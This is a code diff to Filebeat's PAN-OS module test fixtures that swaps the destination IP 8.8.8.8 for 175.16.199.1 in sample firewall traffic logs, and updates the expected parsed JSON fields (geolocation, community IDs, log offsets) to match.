-521 <14>1 2020-03-27T09:57:17+01:00 PA-VM - - - - 1,2020/03/27 09:57:16,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:16,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:16,47300,1,59479,53,5019,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:17,0,any,0,2825802,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+521 <14>1 2020-03-27T09:57:17+01:00 PA-VM - - - - 1,2020/03/27 09:57:16,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:16,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:16,47300,1,59479,53,5019,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:17,0,any,0,2825802,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 533 <14>1 2020-03-27T09:57:17+01:00 PA-VM - - - - 1,2020/03/27 09:57:16,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:16,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:16,62253,1,40462,514,21854,514,0x500000,tcp,allow,575,501,74,4,2020/03/27 09:57:17,0,any,0,2825803,0x0,192.168.0.0-192.168.255.255,Germany,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 580 <14>1 2020-03-27T09:57:16+01:00 PA-VM - - - - 1,2020/03/27 09:57:16,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:16,192.168.2.2,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,google-base,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:16,6765,1,59646,443,10539,443,0x1400070,tcp,allow,7126,1514,5612,22,2020/03/27 09:57:02,0,computer-and-internet-info,0,2825799,0x0,192.168.0.0-192.168.255.255,United States,0,10,12,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic_ietf.log-expected.json b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic_ietf.log-expected.json
index 6a5b9ba6cc08..6e850fe6d225 100644
--- a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic_ietf.log-expected.json
+++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic_ietf.log-expected.json
@@ -211,17 +211,18 @@
 "client.nat.port": 61714,
 "client.packets": 1,
 "client.port": 33101,
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 0,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
- "destination.nat.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
+ "destination.nat.ip": "175.16.199.1",
 "destination.nat.port": 53,
 "destination.packets": 0,
 "destination.port": 53,
@@ -235,7 +236,7 @@
 "event.end": "2020-03-27T09:57:42.000+01:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "521 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:41,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,1615,1,33101,53,61714,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:42,0,any,0,2825925,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+ "event.original": "521 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:41,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,1615,1,33101,53,61714,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:42,0,any,0,2825925,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
 "event.outcome": "success",
 "event.start": "2020-03-27T09:57:42.000+01:00",
 "event.timezone": "+01:00",
@@ -251,8 +252,8 @@
 "network.application": "dns",
 "network.bytes": 98,
 "network.community_id": [
- "1:iZ9KNh4RcbWK6J5ekLnBGXz74BU=",
- "1:zaMaHKHgtAI0P0GFKSvTKuRvtCk="
+ "1:Xmeo6Y2DVUkUnYowlIC4n4AWR+0=",
+ "1:seo73slJOc/8O2q/+p1GlQXgmjk="
 ],
 "network.direction": "unknown",
 "network.packets": 1,
@@ -269,12 +270,12 @@
 "observer.vendor": "Palo Alto Networks",
 "panw.panos.action": "allow",
 "panw.panos.destination.interface": "ethernet1/1",
- "panw.panos.destination.nat.ip": "8.8.8.8",
+ "panw.panos.destination.nat.ip": "175.16.199.1",
 "panw.panos.destination.nat.port": 53,
 "panw.panos.destination.zone": "External",
 "panw.panos.endreason": "n/a",
 "panw.panos.flow_id": "1615",
- "panw.panos.network.nat.community_id": "1:iZ9KNh4RcbWK6J5ekLnBGXz74BU=",
+ "panw.panos.network.nat.community_id": "1:Xmeo6Y2DVUkUnYowlIC4n4AWR+0=",
 "panw.panos.ruleset": "Internet Access",
 "panw.panos.sequence_number": 2825925,
 "panw.panos.source.interface": "ethernet1/3",
@@ -290,13 +291,13 @@
 ],
 "related.ip": [
 "0.0.0.0",
- "192.168.2.4",
- "8.8.8.8"
+ "175.16.199.1",
+ "192.168.2.4"
 ],
 "rule.name": "Internet Access",
 "server.bytes": 0,
- "server.ip": "8.8.8.8",
- "server.nat.ip": "8.8.8.8",
+ "server.ip": "175.16.199.1",
+ "server.nat.ip": "175.16.199.1",
 "server.nat.port": 53,
 "server.packets": 0,
 "server.port": 53,
@@ -350,7 +351,7 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.nat_translated": true,
- "log.offset": 1545,
+ "log.offset": 1555,
 "network.application": "ssl",
 "network.bytes": 575,
 "network.community_id": [
@@ -423,17 +424,18 @@
 "client.nat.port": 65264,
 "client.packets": 1,
 "client.port": 59890,
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 129,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
- "destination.nat.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
+ "destination.nat.ip": "175.16.199.1",
 "destination.nat.port": 53,
 "destination.packets": 1,
 "destination.port": 53,
@@ -447,7 +449,7 @@ "event.end": "2020-03-27T09:57:12.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "527 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:41,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6949,1,59890,53,65264,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:57:12,0,any,0,2825916,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "527 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:41,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6949,1,59890,53,65264,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:57:12,0,any,0,2825916,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:57:12.000+01:00", "event.timezone": "+01:00", @@ -459,12 +461,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 2046, + "log.offset": 2056, "network.application": "dns", "network.bytes": 226, "network.community_id": [ - "1:4ap7s7Ewlo/ITSyY/EunR84iDq8=", - "1:V5wfxRwMjJogpz8WOb9Z2CE+fFA=" + "1:Kmj5qK2SkQ5pRTNmIE5zY6UkTtg=", + "1:Xj2f1cuykp47njJtnIhwkzwPTS0=" ], "network.direction": "unknown", "network.packets": 2, 
@@ -481,12 +483,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "6949", - "panw.panos.network.nat.community_id": "1:V5wfxRwMjJogpz8WOb9Z2CE+fFA=", + "panw.panos.network.nat.community_id": "1:Xj2f1cuykp47njJtnIhwkzwPTS0=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825916, "panw.panos.source.interface": "ethernet1/3", @@ -502,13 +504,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 129, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -533,17 +535,18 @@ "client.nat.port": 54688, "client.packets": 1, "client.port": 34516, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 0, "destination.port": 53, 
@@ -557,7 +560,7 @@ "event.end": "2020-03-27T09:57:42.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "521 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:41,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6776,1,34516,53,54688,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:42,0,any,0,2825923,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "521 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:41,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6776,1,34516,53,54688,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:42,0,any,0,2825923,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:57:42.000+01:00", "event.timezone": "+01:00", @@ -569,12 +572,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 2553, + "log.offset": 2573, "network.application": "dns", "network.bytes": 97, "network.community_id": [ - "1:TXdbrHDkJL7c4Toz73rcSBV0T80=", - "1:YyWAstwqKQo8JRjHVJZ2iv0huLA=" + "1:JZThhPVx31q0qgpymCG6PhBdZl8=", + "1:iM4w5s97AuwG1BAz2htMwU5KyOI=" ], "network.direction": "unknown", "network.packets": 1, 
@@ -591,12 +594,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "n/a", "panw.panos.flow_id": "6776", - "panw.panos.network.nat.community_id": "1:YyWAstwqKQo8JRjHVJZ2iv0huLA=", + "panw.panos.network.nat.community_id": "1:iM4w5s97AuwG1BAz2htMwU5KyOI=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825923, "panw.panos.source.interface": "ethernet1/3", @@ -612,13 +615,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 0, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 0, "server.port": 53, @@ -672,7 +675,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 3054, + "log.offset": 3084, "network.application": "ssl", "network.bytes": 575, "network.community_id": [ 
@@ -745,17 +748,18 @@ "client.nat.port": 47171, "client.packets": 1, "client.port": 51150, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 130, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -769,7 +773,7 @@ "event.end": "2020-03-27T09:57:12.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "527 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:41,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6578,1,51150,53,47171,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:12,0,any,0,2825917,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "527 <14>1 2020-03-27T09:57:41+01:00 PA-VM - - - - 1,2020/03/27 09:57:41,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:41,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:41,6578,1,51150,53,47171,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:12,0,any,0,2825917,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:57:12.000+01:00", "event.timezone": "+01:00", @@ -781,12 +785,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 3554, + "log.offset": 3584, "network.application": "dns", "network.bytes": 228, "network.community_id": [ - "1:/QKiNYN5LRWf/GXzKOZ5wzrtpzs=", - "1:KxK8ZPfaaBYRsG1EXYQq/SwloKk=" + "1:jQzxuaMBPxuub+EEEPA50FIvbq0=", + "1:yu+bKGhSY0gWNU43UV1iXit1Tcs=" ], "network.direction": "unknown", "network.packets": 2, 
@@ -803,12 +807,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "6578", - "panw.panos.network.nat.community_id": "1:/QKiNYN5LRWf/GXzKOZ5wzrtpzs=", + "panw.panos.network.nat.community_id": "1:jQzxuaMBPxuub+EEEPA50FIvbq0=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825917, "panw.panos.source.interface": "ethernet1/3", @@ -824,13 +828,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 130, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, @@ -884,7 +888,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 4061, + "log.offset": 4101, "network.application": "ssl", "network.bytes": 104899, "network.community_id": [ @@ -981,7 +985,7 @@ ], "fileset.name": "panos", "input.type": "log", - "log.offset": 4599, + "log.offset": 4639, "network.application": "dns", "network.bytes": 78, "network.community_id": "1:L1tNWtY4X9TZ6Yzx1yBczR0mkOU=", @@ -1076,7 +1080,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 5104, + "log.offset": 5144, "network.application": "ssl", "network.bytes": 763, "network.community_id": [ @@ -1179,7 +1183,7 @@ "input.type": "log", "labels.nat_translated": true, "labels.ssl_decrypted": true, - "log.offset": 5610, + "log.offset": 5650, "network.application": "google-base", "network.bytes": 7053, "network.community_id": [ 
@@ -1252,17 +1256,18 @@ "client.nat.port": 8799, "client.packets": 1, "client.port": 44670, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 129, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -1276,7 +1281,7 @@ "event.end": "2020-03-27T09:57:07.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "527 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:36,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,57688,1,44670,53,8799,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:57:07,0,any,0,2825899,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "527 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:36,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,57688,1,44670,53,8799,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:57:07,0,any,0,2825899,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:57:07.000+01:00", "event.timezone": "+01:00", @@ -1288,12 +1293,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 6157, + "log.offset": 6197, "network.application": "dns", "network.bytes": 226, "network.community_id": [ - "1:fQ9CdNkui7fy1kmGg3+Q8GoVDj0=", - "1:rjZLUyzi918RXeJx7TcYqv9rtTA=" + "1:mMi6WFHb8TB1RQ3ARBbPWKQXvFI=", + "1:wRQjQWlUEXgAOAXNTZ26wJ+I5rs=" ], "network.direction": "unknown", "network.packets": 2, 
@@ -1310,12 +1315,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "57688", - "panw.panos.network.nat.community_id": "1:fQ9CdNkui7fy1kmGg3+Q8GoVDj0=", + "panw.panos.network.nat.community_id": "1:wRQjQWlUEXgAOAXNTZ26wJ+I5rs=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825899, "panw.panos.source.interface": "ethernet1/3", @@ -1331,13 +1336,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 129, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, @@ -1391,7 +1396,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 6664, + "log.offset": 6714, "network.application": "ssl", "network.bytes": 905, "network.community_id": [ @@ -1493,7 +1498,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 7167, + "log.offset": 7217, "network.application": "ssl", "network.bytes": 839, "network.community_id": [ @@ -1595,7 +1600,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 7671, + "log.offset": 7721, "network.application": "ssl", "network.bytes": 575, "network.community_id": [ 
@@ -1668,17 +1673,18 @@ "client.nat.port": 40301, "client.packets": 1, "client.port": 42451, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 130, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -1692,7 +1698,7 @@ "event.end": "2020-03-27T09:57:07.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "528 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:36,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,62291,1,42451,53,40301,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:07,0,any,0,2825900,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "528 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:36,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,62291,1,42451,53,40301,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:07,0,any,0,2825900,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:57:07.000+01:00", "event.timezone": "+01:00", @@ -1704,12 +1710,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 8171, + "log.offset": 8221, "network.application": "dns", "network.bytes": 228, "network.community_id": [ - "1:AsZoaA1egxEkeLWNuaLsth3c1D4=", - "1:fazjDjHWA1VTTbFV+P/qh4KzL38=" + "1:D2AbZBM3a4fe+hl0rapK3Ftvkz0=", + "1:rr7uPXF0/vBL8BMWVbygmK8/OZw=" ], "network.direction": "unknown", "network.packets": 2, 
@@ -1726,12 +1732,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "62291", - "panw.panos.network.nat.community_id": "1:fazjDjHWA1VTTbFV+P/qh4KzL38=", + "panw.panos.network.nat.community_id": "1:D2AbZBM3a4fe+hl0rapK3Ftvkz0=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825900, "panw.panos.source.interface": "ethernet1/3", @@ -1747,13 +1753,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 130, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
